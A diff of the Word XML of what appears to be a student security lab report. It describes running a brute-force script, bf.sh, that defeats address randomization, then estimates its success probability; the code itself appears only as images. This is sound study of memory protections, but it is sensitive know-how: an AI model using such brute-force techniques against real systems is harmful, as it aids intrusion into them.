+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>opied the shell code and named it as bf.sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A120E15" wp14:editId="05A62210">
+            <wp:extent cx="5274310" cy="1346200"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
+            <wp:docPr id="18" name="图片 18"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1346200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId14"/>
-      <w:headerReference w:type="default" r:id="rId15"/>
-      <w:footerReference w:type="even" r:id="rId16"/>
-      <w:footerReference w:type="default" r:id="rId17"/>
-      <w:headerReference w:type="first" r:id="rId18"/>
-      <w:footerReference w:type="first" r:id="rId19"/>
+      <w:headerReference w:type="even" r:id="rId27"/>
+      <w:headerReference w:type="default" r:id="rId28"/>
+      <w:footerReference w:type="even" r:id="rId29"/>
+      <w:footerReference w:type="default" r:id="rId30"/>
+      <w:headerReference w:type="first" r:id="rId31"/>
+      <w:footerReference w:type="first" r:id="rId32"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
       <w:cols w:space="425"/>
@@ -2425,6 +8608,39 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="sc161">
+    <w:name w:val="sc161"/>
+    <w:basedOn w:val="a0"/>
+    <w:rsid w:val="00B161EA"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      <w:color w:val="8000FF"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="sc41">
+    <w:name w:val="sc41"/>
+    <w:basedOn w:val="a0"/>
+    <w:rsid w:val="00B161EA"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      <w:color w:val="FF8000"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="sc61">
+    <w:name w:val="sc61"/>
+    <w:basedOn w:val="a0"/>
+    <w:rsid w:val="007D16BD"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      <w:color w:val="808080"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Project_2_Report_Enze_Xu.docx
+++ b/Project_2_Report_Enze_Xu.docx
@@ -7686,19 +7686,2426 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>hen run the code</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07B9069A" wp14:editId="603EF8A4">
+            <wp:extent cx="4906060" cy="352474"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
+            <wp:docPr id="21" name="图片 21"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4906060" cy="352474"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="491CA096" wp14:editId="0995EFB3">
+            <wp:extent cx="1868285" cy="1719830"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="20" name="图片 20"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1908060" cy="1756444"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">t seems I am so lucky that it cost me less than </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>minute to defeat the randomization.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">So let me do a simple </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>estimat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ion.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Let </w:t>
+      </w:r>
+      <m:oMath>
+        <m:r>
+          <w:rPr>
+            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <m:t>t</m:t>
+        </m:r>
+      </m:oMath>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is the average time of a single execution, </w:t>
+      </w:r>
+      <m:oMath>
+        <m:sSub>
+          <m:sSubPr>
+            <m:ctrlPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </m:ctrlPr>
+          </m:sSubPr>
+          <m:e>
+            <m:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <m:t>p</m:t>
+            </m:r>
+          </m:e>
+          <m:sub>
+            <m:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <m:t>0</m:t>
+            </m:r>
+          </m:sub>
+        </m:sSub>
+      </m:oMath>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is the single match </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>probability</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <m:oMath>
+        <m:r>
+          <w:rPr>
+            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <m:t>P</m:t>
+        </m:r>
+        <m:d>
+          <m:dPr>
+            <m:ctrlPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </m:ctrlPr>
+          </m:dPr>
+          <m:e>
+            <m:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <m:t>k</m:t>
+            </m:r>
+          </m:e>
+        </m:d>
+      </m:oMath>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">is the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">average </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">overall match </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>probability</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> after </w:t>
+      </w:r>
+      <m:oMath>
+        <m:r>
+          <w:rPr>
+            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <m:t>k</m:t>
+        </m:r>
+      </m:oMath>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>turns. We have:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <m:oMathPara>
+        <m:oMath>
+          <m:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <m:t>t=</m:t>
+          </m:r>
+          <m:f>
+            <m:fPr>
+              <m:ctrlPr>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:i/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+              </m:ctrlPr>
+            </m:fPr>
+            <m:num>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>38</m:t>
+              </m:r>
+            </m:num>
+            <m:den>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>45024</m:t>
+              </m:r>
+            </m:den>
+          </m:f>
+          <m:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <m:t>=8.44</m:t>
+          </m:r>
+          <m:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <m:t>×</m:t>
+          </m:r>
+          <m:sSup>
+            <m:sSupPr>
+              <m:ctrlPr>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:i/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+              </m:ctrlPr>
+            </m:sSupPr>
+            <m:e>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>10</m:t>
+              </m:r>
+            </m:e>
+            <m:sup>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>-4</m:t>
+              </m:r>
+            </m:sup>
+          </m:sSup>
+          <m:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <m:t>s</m:t>
+          </m:r>
+        </m:oMath>
+      </m:oMathPara>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <m:oMathPara>
+        <m:oMath>
+          <m:sSub>
+            <m:sSubPr>
+              <m:ctrlPr>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:i/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+              </m:ctrlPr>
+            </m:sSubPr>
+            <m:e>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>p</m:t>
+              </m:r>
+            </m:e>
+            <m:sub>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>0</m:t>
+              </m:r>
+            </m:sub>
+          </m:sSub>
+          <m:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <m:t>=</m:t>
+          </m:r>
+          <m:f>
+            <m:fPr>
+              <m:ctrlPr>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:i/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+              </m:ctrlPr>
+            </m:fPr>
+            <m:num>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>1</m:t>
+              </m:r>
+            </m:num>
+            <m:den>
+              <m:sSup>
+                <m:sSupPr>
+                  <m:ctrlPr>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                      <w:i/>
+                      <w:sz w:val="24"/>
+                      <w:szCs w:val="24"/>
+                    </w:rPr>
+                  </m:ctrlPr>
+                </m:sSupPr>
+                <m:e>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                      <w:sz w:val="24"/>
+                      <w:szCs w:val="24"/>
+                    </w:rPr>
+                    <m:t>2</m:t>
+                  </m:r>
+                </m:e>
+                <m:sup>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                      <w:sz w:val="24"/>
+                      <w:szCs w:val="24"/>
+                    </w:rPr>
+                    <m:t>19</m:t>
+                  </m:r>
+                </m:sup>
+              </m:sSup>
+            </m:den>
+          </m:f>
+          <m:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <m:t>=1</m:t>
+          </m:r>
+          <m:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <m:t>.</m:t>
+          </m:r>
+          <m:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <m:t>9073×</m:t>
+          </m:r>
+          <m:sSup>
+            <m:sSupPr>
+              <m:ctrlPr>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:i/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+              </m:ctrlPr>
+            </m:sSupPr>
+            <m:e>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>10</m:t>
+              </m:r>
+            </m:e>
+            <m:sup>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>-6</m:t>
+              </m:r>
+            </m:sup>
+          </m:sSup>
+        </m:oMath>
+      </m:oMathPara>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <m:oMathPara>
+        <m:oMath>
+          <m:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <m:t>P</m:t>
+          </m:r>
+          <m:d>
+            <m:dPr>
+              <m:ctrlPr>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:i/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+              </m:ctrlPr>
+            </m:dPr>
+            <m:e>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>k</m:t>
+              </m:r>
+            </m:e>
+          </m:d>
+          <m:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <m:t>=1-</m:t>
+          </m:r>
+          <m:sSup>
+            <m:sSupPr>
+              <m:ctrlPr>
